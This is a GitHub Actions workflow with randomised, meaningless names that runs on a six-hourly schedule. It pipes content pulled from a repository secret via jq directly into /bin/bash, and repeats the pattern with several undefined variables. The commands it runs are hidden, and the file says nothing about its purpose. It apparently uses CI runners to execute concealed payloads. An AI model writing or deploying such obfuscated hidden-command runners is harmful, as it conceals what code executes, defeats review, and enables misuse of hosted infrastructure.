name: zhoujinwei2345

on:
  workflow_dispatch:
  schedule:
    - cron: '58 3/6 * * *'

jobs:  # 17553
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhoujinwei2345
        env:
          lxswq22: ${{ secrets.lxswq22 }}
        run: |
          echo $lxswq22 | jq -r .rxn355 | /bin/bash
          echo $fyk8 | jq -r .waht10 | /bin/bash
          echo $uu5390 | jq -r .ovknm3272 | /bin/bash
          echo $t63539 | jq -r .hx24695 | /bin/bash
          echo $yjy9111 | jq -r .scdnz639 | /bin/bash

